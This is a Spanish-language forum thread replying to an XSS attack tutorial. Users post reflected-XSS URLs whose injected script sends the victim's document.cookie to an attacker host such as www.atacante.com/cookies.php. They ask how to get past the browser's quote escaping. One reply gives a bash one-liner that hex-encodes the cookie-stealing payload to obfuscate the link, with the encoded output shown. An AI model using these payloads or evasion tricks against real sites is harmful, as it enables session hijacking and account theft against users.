  El caso es que ando probando esta forma de ataque XSS con una aplicación vulnerable, y otra aplicación malintencionada, ambas creadas y alojadas por mi, y no consigo hacerlo funcionar. El codigo de la aplicacion malintencionada es exactamente el propuesto aqui para copiar la cookie a "archivo.txt" y la "url maligna" queda del siguiente modo:
Código:
http://80.34.108.239/hackw20/application/user_management/login.php?msg=<script>window.location='http://127.0.0.1/evil/application/cookie_steal.php?cookie='+document.cookie;</script>;
El caso es que al ver posteriormente el codigo fuente de la pagina, parece que en navegador (probado en opera y en chrome) inserta caracteres de escape para las comillas simples, es decir ' -> \' con lo que parece que los navegadores ya proporcionan proteccion contra este tipo de ataque. He probado a cambiar desde la ? a hexadecimal.., a cambiar las comillas simples por dobles, y nada. Unicamente al cambiar las simples por graves ' -> ` parece que el navegador no las toca, pero tampoco funciona. ¿Alguna idea de si este comportamiento es asi, o estoy haciendo algo mal? En caso de que sea asi ¿como lo engañamos? Gracias.

Saludos!


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: jilipum en 23 Octubre 2010, 01:22 am
Eh hola a todos que hay de nuevo pipol , ultimamente pasaba bastante por aquí aparte de por otros  sitios similiares... y nada que com ultimamte estoy muy desocupado y motivado ,y aparte de esta pregunta, que ha quedao abierta al publico ....

pues haber si se pasa alguién de buen rollo y aclara el ultimo mensaje de danielyyo...
lo pido porfavor es que se me ace un poco duro estar leiendo tó el post y quedarme con dudas en el ultimo sms...   

no me quejo de nada esto se que es en todos los sitios lo que me pongo a buscar cosas del metasploit por ejemplo y acavo leiendo estas cosas que aunque se aprende mucho y puedan servir de gran utilidad, me desvian demasiado...

¿aún funciona con algo esta teknika o ya está parcheada ? y si ya esta parcheada, me pregunto también, ¿si no hay forma de dar permisos como a los firewalls o modificar antes algo en el host/ip victima por ejemplo mediante una shell u argo?




Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: pelonms7 en 9 Febrero 2011, 15:15 pm
Saludos,

Estuve intentando el tutorial y me parece genial, lo malo es que no se estan guardando las cookies en el archivo txt, revisando una y otra ves el tutorial vi que en la ultima parte tiene el boton buscar (&buscar) para que se pueda ejecutar, yo NO lo estoy haciendo en el campo de busqueda lo estoy haciendo directamente en el URL, y vi que decia que necesita del boton buscar para que se pueda ejecutar, en este caso que no hay boton buscar como se hace para ejecutarlo

asi deberia quedar
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;

asi se ve el mio
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>

como puedo hacer para que se ejecute? Saludos


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: ERA en 4 Diciembre 2018, 19:25 pm
Muy bueno el esfuerzo para la explicación!  ;-)

Me dieron ganas de colaborar!

Para ofuscar la URL

Crean el archivo ./toHexUrl.sh o como les plasca el nombre y le ponen dentro:

#!/bin/bash
echo $1 | hexdump -ve '/1 " %02X"'|sed s/' '/%/g;

Lo usan así:

 ./toHexUrl.sh  "<script>alert('pepe');</script>"

Produce:

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%70%65%70%65%27%29%3B%3C%2F%73%63%72%69%70%74%3E%0A


Sino, pueden hacer así:

printf "<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>"|hexdump -ve '/1 " %02X"'|sed s/' '/%/g;

%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%61%74%61%63%61%6E%74%65%2E%63%6F%6D%2F%63%6F%6F%6B%69%65%73%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E


 :silbar: ::)


Título: Re: [::Tutorial::] - Ataques XSS
Publicado por: ERA en 4 Diciembre 2018, 19:27 pm
ufff, lo siento si alguien dijo antes lo que yo, no vi que habia 6 hojas, mala mia!, me quede en la primera  :-[